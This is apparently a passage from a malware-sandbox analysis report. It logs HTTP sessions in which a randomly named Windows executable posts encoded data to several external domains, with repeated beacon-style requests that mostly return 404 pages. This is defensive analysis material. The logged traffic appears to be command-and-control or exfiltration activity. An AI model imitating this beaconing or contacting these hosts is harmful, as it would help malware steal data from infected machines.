                                                                        Nov 9, 2024 05:37:25.463197947 CET | 369 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx/1.26.1
                                                                        Date: Sat, 09 Nov 2024 04:37:25 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Content-Encoding: gzip


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        28 | 192.168.2.5 | 50009 | 167.172.133.32 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:37:27.351109028 CET | 491 | OUT | GET /2493/?aF=JLp4o0Qx2F-p4F&J8LHgDJp=jH4Cb08gek16/2FqI6arh4PQxRW9qayf8vOptAV1ciloHQcwXJuEWMhJ8+kmyy6nu0+F87CgCWTPmYOVFW7qHeowlszl5iXL8EHw53KjcBxSho9HkZ7HZn7te055AXvZAw== HTTP/1.1
                                                                        Host: www.winspinoffr.pro
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:37:28.015291929 CET | 705 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx/1.26.1
                                                                        Date: Sat, 09 Nov 2024 04:37:27 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 555
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        29 | 192.168.2.5 | 50010 | 67.223.117.142 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:37:33.124536037 CET | 737 | OUT | POST /hcih/ HTTP/1.1
                                                                        Host: www.maviro.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.maviro.xyz
                                                                        Referer: http://www.maviro.xyz/hcih/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=1KXUKOpPT48+w/DMSSg3VpeBYaanJ9DfLsdKG/pw0kBqf18aTu3OtypmCii8IBh8ETssMQAC46NmxWasjiyf9i1qdStIdA3ZodpTOhOdrjda7oEya8iGzg0L/oxEwpXJg/8zfoh+f60yEmGLfbKGQeiZOuopA1U/3PyZiZEP7iQWRTHwDUc5IOXBk87hsbefXPY0Tw8=
                                                                        Nov 9, 2024 05:37:33.830866098 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 09 Nov 2024 04:37:33 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        30 | 192.168.2.5 | 50011 | 67.223.117.142 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:37:35.661485910 CET | 757 | OUT | POST /hcih/ HTTP/1.1
                                                                        Host: www.maviro.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.maviro.xyz
                                                                        Referer: http://www.maviro.xyz/hcih/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=1KXUKOpPT48+xb/MdSc3TJeAdaanAdDbLsRKG9FG0SRqahwaSqjOqypmayj0GhhjETweMSUC4+tmxWKsjRrt7y1sGCtOAw3ZodpTOgunrjla4Y0ybdiByg0I+oxE0pXNg/8BftApf4MyEmWLfKKHaeibAOprBglv/Punp61vsDYyQl2aZ2URbu750vzW9r/2NsIENnr4mYEzq3e8bi3vD5Sawrxq
                                                                        Nov 9, 2024 05:37:36.365564108 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 09 Nov 2024 04:37:36 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        31 | 192.168.2.5 | 50012 | 67.223.117.142 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:37:38.380681992 CET | 1774 | OUT | POST /hcih/ HTTP/1.1
                                                                        Host: www.maviro.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.maviro.xyz
                                                                        Referer: http://www.maviro.xyz/hcih/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp= [TRUNCATED]
                                                                        Nov 9, 2024 05:37:38.960654020 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 09 Nov 2024 04:37:38 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        32 | 192.168.2.5 | 50013 | 67.223.117.142 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:37:40.945723057 CET | 486 | OUT | GET /hcih/?J8LHgDJp=4I/0J6YfWYwRno7rH0k2bI6cVdalKpPNFcVIT9hZ02dsPRsaZO23kVRDbCaRJTowDBACcCwGuYsZ/ib1kw640ghKfTJpeVfXv/8QQFzliEtlwJs4R/u7+hsr/ZpE446a8w==&aF=JLp4o0Qx2F-p4F HTTP/1.1
                                                                        Host: www.maviro.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:37:41.648132086 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 09 Nov 2024 04:37:41 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        33 | 192.168.2.5 | 50014 | 172.96.191.232 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:37:46.790672064 CET | 767 | OUT | POST /21bn/ HTTP/1.1
                                                                        Host: www.thefokusdong43.click
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.thefokusdong43.click
                                                                        Referer: http://www.thefokusdong43.click/21bn/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=GWvdlheS/p92lI5PzOyMfJTrAeZqRjiAubRA88GHrS2y9sAfn4YZmgkJaOQvBe7S5iRChH6PdjiylX6cd2ISTvrg5aUGHWBpkEK+7wLhwSoO1dXvkf/mDHFhn1IFVTeNmpDV5ZKwezwM2QWginK8va7bKja0ag24QOp7YNmOBTL2ItTyjiJlCs0jZKFv7zrVIRbI5Z8=
                                                                        Nov 9, 2024 05:37:47.776160955 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 796
                                                                        date: Sat, 09 Nov 2024 04:37:47 GMT
                                                                        server: LiteSpeed
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        34 | 192.168.2.5 | 50015 | 172.96.191.232 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:37:49.341437101 CET | 787 | OUT | POST /21bn/ HTTP/1.1
                                                                        Host: www.thefokusdong43.click
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.thefokusdong43.click
                                                                        Referer: http://www.thefokusdong43.click/21bn/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=GWvdlheS/p9237xPg+OMO5T0DeZqeDjJubNA89Tcrgiy+NQfm6wZlgkJVuQqO+7j5lZ8hDmPdj2ylVicdB0TT/rmgKUEK2BpkEK+7wOEwSwO2oHvm+/pc3Fg3FIFDTeJmpDz5ciWewIM2QGgiS+j6q7dVzb9UxnxQ/l7fbnJYlHzNbiY5ABNRMYbJZNYqDK8SyL4nOqR7tLUWZ+YlnSPPXZ1VC7I
                                                                        Nov 9, 2024 05:37:50.325305939 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 796
                                                                        date: Sat, 09 Nov 2024 04:37:50 GMT
                                                                        server: LiteSpeed
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        35 | 192.168.2.5 | 50016 | 172.96.191.232 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:37:51.880980968 CET | 1804 | OUT | POST /21bn/ HTTP/1.1
                                                                        Host: www.thefokusdong43.click
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.thefokusdong43.click
                                                                        Referer: http://www.thefokusdong43.click/21bn/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp= [TRUNCATED]
                                                                        Nov 9, 2024 05:37:52.860331059 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 796
                                                                        date: Sat, 09 Nov 2024 04:37:52 GMT
                                                                        server: LiteSpeed
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        36 | 192.168.2.5 | 50017 | 172.96.191.232 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:37:54.426398993 CET | 496 | OUT | GET /21bn/?aF=JLp4o0Qx2F-p4F&J8LHgDJp=LUH9mU7gyodu165Py4LvPMqvM6tVT1yZnoho0cb8kzCV8K1cnf0TlkgJLscSA+u/wE57w1zHLj7MmynPemRfd+7x471fFzVs5Vj8lBvl1x4666HrkdrwF1YQmmc6Rlfi/w== HTTP/1.1
                                                                        Host: www.thefokusdong43.click
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:37:55.435995102 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 796
                                                                        date: Sat, 09 Nov 2024 04:37:55 GMT
                                                                        server: LiteSpeed
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        37 | 192.168.2.5 | 50018 | 3.33.130.190 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:38:00.692640066 CET | 737 | OUT | POST /9lti/ HTTP/1.1
                                                                        Host: www.7fh27o.vip
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.7fh27o.vip
                                                                        Referer: http://www.7fh27o.vip/9lti/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=tcK6OsawC8JA218sXuPcOSvo9TVgnOzYgZ8LF/YrwkMMUAJAd7Uoewb2C1Ac2YKYxFMu8LdKXpG3SklnFIGIZVXDOaEF3n1e6sY+MRae/QdGBeq6BrrkMbtma22yaIs67rsb0ZDQqllijb9mZmNBAD16JDTjKHfwyKocQBMfn9vaB+0C9laL9cqlI9ko+MRYf2HDMP4=


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        38 | 192.168.2.5 | 50019 | 3.33.130.190 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:38:03.283164024 CET | 757 | OUT | POST /9lti/ HTTP/1.1
                                                                        Host: www.7fh27o.vip
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.7fh27o.vip
                                                                        Referer: http://www.7fh27o.vip/9lti/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=tcK6OsawC8JA1WUsVJ7cPyvrhDVgpuzcgZwLF6g7xWYMTkZAa4Modwb2JVBU44KpxFwm8JJKXpC3SlVnF7uPbFXdWqEH4H1e6sY+MSnW/QFGCv66AJDnKrtnL22yeIs27rsp0dD2qmNijeZmazhOLD18KzSODUG0/aU2UgNVxLjfAIFonHSju8GdYusfv8wxFVXzSYsZ2hxW4etIOKqCa/uEjrjs


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        39 | 192.168.2.5 | 50020 | 3.33.130.190 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:38:05.817269087 CET | 1774 | OUT | POST /9lti/ HTTP/1.1
                                                                        Host: www.7fh27o.vip
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.7fh27o.vip
                                                                        Referer: http://www.7fh27o.vip/9lti/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp= [TRUNCATED]


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        40 | 192.168.2.5 | 50021 | 3.33.130.190 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:38:08.492327929 CET | 486 | OUT | GET /9lti/?J8LHgDJp=geiaNc/IHvVr1XtPIeaNP3WF7XhVraHppqovBYUyzl5ecV5+b9ApcmryUDB5zfHGxHwTi5lfOLOrSi1EPqCbf0z3Xdxd0TcO0Ng9DzbN/wxAK8CjGZPvJp4ddlq6R6JTvg==&aF=JLp4o0Qx2F-p4F HTTP/1.1
                                                                        Host: www.7fh27o.vip
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:38:09.122514963 CET | 414 | IN | HTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Sat, 09 Nov 2024 04:38:09 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 274
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?J8LHgDJp=geiaNc/IHvVr1XtPIeaNP3WF7XhVraHppqovBYUyzl5ecV5+b9ApcmryUDB5zfHGxHwTi5lfOLOrSi1EPqCbf0z3Xdxd0TcO0Ng9DzbN/wxAK8CjGZPvJp4ddlq6R6JTvg==&aF=JLp4o0Qx2F-p4F"}</script></head></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        41 | 192.168.2.5 | 50022 | 217.160.0.220 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:38:14.351756096 CET | 743 | OUT | POST /42c3/ HTTP/1.1
                                                                        Host: www.eyecatch.pro
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.eyecatch.pro
                                                                        Referer: http://www.eyecatch.pro/42c3/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=EDr9c0rgzZYsBcJpyhJKfCpW2eRdkKas215uqhx/MXLgU8GBL/ZgCR9NjXa3/j/EtnmI/EoczGimZ88aGdoVtqKl+0Q64FNm2aR9aC45NvgcLqcCYclcW0Y7jZ3oqKotfXFMhNFg1q/AeEgJ1Lq6457DtXAMH/+x9gfFxbWAwwZs24a8o2x+NVx/UTWACN7AGpKIBpw=
                                                                        Nov 9, 2024 05:38:15.270565987 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Date: Sat, 09 Nov 2024 04:38:15 GMT
                                                                        Server: Apache
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        Link: <https://eyecatch.pro/wp-json/>; rel="https://api.w.org/"
                                                                        Content-Encoding: gzip


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        42 | 192.168.2.5 | 50023 | 217.160.0.220 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:38:16.909898043 CET | 763 | OUT | POST /42c3/ HTTP/1.1
                                                                        Host: www.eyecatch.pro
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.eyecatch.pro
                                                                        Referer: http://www.eyecatch.pro/42c3/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
